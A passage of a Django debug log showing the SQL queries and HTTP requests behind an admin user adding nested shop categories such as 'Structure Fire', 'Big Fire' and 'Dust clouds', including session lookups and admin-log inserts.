WHERE ("django_session"."expire_date" > '2019-12-13T13:06:17.788523+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 17, 788523, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:17,800 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:06:17,806 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-13 13:06:17,812 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-13 13:06:17,815 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 1 AND "shop_category"."slug" = 'structure-fire') LIMIT 1; args=(1, 'structure-fire') DEBUG 2019-12-13 13:06:17,816 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Structure Fire' LIMIT 1; args=('Structure Fire',) DEBUG 2019-12-13 13:06:17,820 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Structure Fire' AND "shop_category"."parent_id" = 1) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Structure Fire', 1) DEBUG 2019-12-13 13:06:17,821 utils 11259 139831317362432 (0.000) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(1,) DEBUG 2019-12-13 13:06:17,823 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 3 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 3, 3, 3] DEBUG 2019-12-13 13:06:17,828 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Structure Fire', 1, 'categories/2019/12/13/collection3_blWHbYx.png', 'Structure Fire', false, 'structure-fire', 4, 5, 3, 1) RETURNING "shop_category"."id"; args=('Structure Fire', 1, 'categories/2019/12/13/collection3_blWHbYx.png', 'Structure Fire', False, 'structure-fire', 4, 5, 3, 1) DEBUG 2019-12-13 13:06:17,830 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:06:17.828607+00:00'::timestamptz, 6, 8, '19', 'Structure Fire', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 6, 17, 828607, tzinfo=), 6, 8, '19', 'Structure Fire', 1, '[{"added": {}}]') [13/Dec/2019 13:06:17] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:06:18,132 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:18.121369+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 18, 121369, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:18,136 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:06:18,201 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:06:18,254 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:06:18.251962+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 6, 18, 251962, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:06:18] "GET /shop/category/add/ HTTP/1.0" 200 8094 DEBUG 2019-12-13 13:06:18,598 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:18.588606+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 18, 588606, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:18,601 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:06:18] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:06:37,669 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:37.658545+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 37, 658545, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:37,672 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:06:37,681 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-13 13:06:37,689 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-13 13:06:37,692 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 1 AND "shop_category"."slug" = 'big-fire') LIMIT 1; args=(1, 'big-fire') DEBUG 2019-12-13 13:06:37,694 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Big Fire' LIMIT 1; args=('Big Fire',) DEBUG 2019-12-13 13:06:37,698 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Big Fire' AND "shop_category"."parent_id" = 1) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Big Fire', 1) DEBUG 2019-12-13 13:06:37,701 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-13 13:06:37,703 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 3 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 3, 1, 1] DEBUG 2019-12-13 13:06:37,708 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Big Fire', 1, 'categories/2019/12/13/collection3_3c60jfJ.png', 'Big Fire', false, 'big-fire', 2, 3, 3, 1) RETURNING "shop_category"."id"; args=('Big Fire', 1, 'categories/2019/12/13/collection3_3c60jfJ.png', 'Big Fire', False, 'big-fire', 2, 3, 3, 1) DEBUG 2019-12-13 13:06:37,710 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:06:37.709035+00:00'::timestamptz, 6, 8, '20', 'Big Fire', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 6, 37, 709035, tzinfo=), 6, 8, '20', 'Big Fire', 1, '[{"added": {}}]') [13/Dec/2019 13:06:37] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:06:38,013 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:37.999083+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 37, 999083, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:38,017 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:06:38,086 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:06:38,216 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:06:38.212565+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 6, 38, 212565, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:06:38] "GET /shop/category/add/ HTTP/1.0" 200 8132 DEBUG 2019-12-13 13:06:38,579 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:38.567338+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 38, 567338, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:38,583 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:06:38] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:06:53,213 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:53.204625+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 53, 204625, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:53,216 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:06:53,221 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-13 13:06:53,225 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-13 13:06:53,227 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 1 AND "shop_category"."slug" = 'small-fire') LIMIT 1; args=(1, 'small-fire') DEBUG 2019-12-13 13:06:53,228 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Small Fire' LIMIT 1; args=('Small Fire',) DEBUG 2019-12-13 13:06:53,231 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Small Fire' AND "shop_category"."parent_id" = 1) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Small Fire', 1) DEBUG 2019-12-13 13:06:53,233 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-13 13:06:53,235 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 5 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 5 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 3 AND ("lft" > 5 OR "rght" > 5); args=[5, 2, 5, 2, 3, 5, 5] DEBUG 2019-12-13 13:06:53,237 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Small Fire', 1, 'categories/2019/12/13/collection4.png', 'Small Fire', false, 'small-fire', 6, 7, 3, 1) RETURNING "shop_category"."id"; args=('Small Fire', 1, 'categories/2019/12/13/collection4.png', 'Small Fire', False, 'small-fire', 6, 7, 3, 1) DEBUG 2019-12-13 13:06:53,239 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:06:53.238408+00:00'::timestamptz, 6, 8, '21', 'Small Fire', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 6, 53, 238408, tzinfo=), 6, 8, '21', 'Small Fire', 1, '[{"added": {}}]') [13/Dec/2019 13:06:53] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:06:53,539 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:53.530240+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 53, 530240, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:53,542 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:06:53,586 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:06:53,627 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:06:53.625415+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 6, 53, 625415, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:06:53] "GET /shop/category/add/ HTTP/1.0" 200 8180 DEBUG 2019-12-13 13:06:53,987 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:06:53.978183+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 6, 53, 978183, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:06:53,990 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:06:53] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:07:40,724 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:07:40.715583+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 7, 40, 715583, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:07:40,727 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:07:40,733 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-13 13:07:40,738 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 3 LIMIT 1; args=(3,) DEBUG 2019-12-13 13:07:40,740 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 3 AND "shop_category"."slug" = 'dust-clouds') LIMIT 1; args=(3, 'dust-clouds') DEBUG 2019-12-13 13:07:40,741 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Dust clouds' LIMIT 1; args=('Dust clouds',) DEBUG 2019-12-13 13:07:40,743 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(3,) DEBUG 2019-12-13 13:07:40,744 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 4 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 4, 1, 1] DEBUG 2019-12-13 13:07:40,747 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Dust clouds', 3, 'categories/2019/12/13/collection3_lEyiVWB.png', 'Dust clouds', false, 'dust-clouds', 2, 3, 4, 1) RETURNING "shop_category"."id"; args=('Dust clouds', 3, 'categories/2019/12/13/collection3_lEyiVWB.png', 'Dust clouds', False, 'dust-clouds', 2, 3, 4, 1) DEBUG 2019-12-13 13:07:40,749 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:07:40.748353+00:00'::timestamptz, 6, 8, '22', 'Dust clouds', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 7, 40, 748353, tzinfo=), 6, 8, '22', 'Dust clouds', 1, '[{"added": {}}]') [13/Dec/2019 13:07:40] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:07:41,044 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:07:41.035396+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 7, 41, 35396, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:07:41,048 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:07:41,092 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:07:41,140 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:07:41.138213+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 7, 41, 138213, tzinfo=), 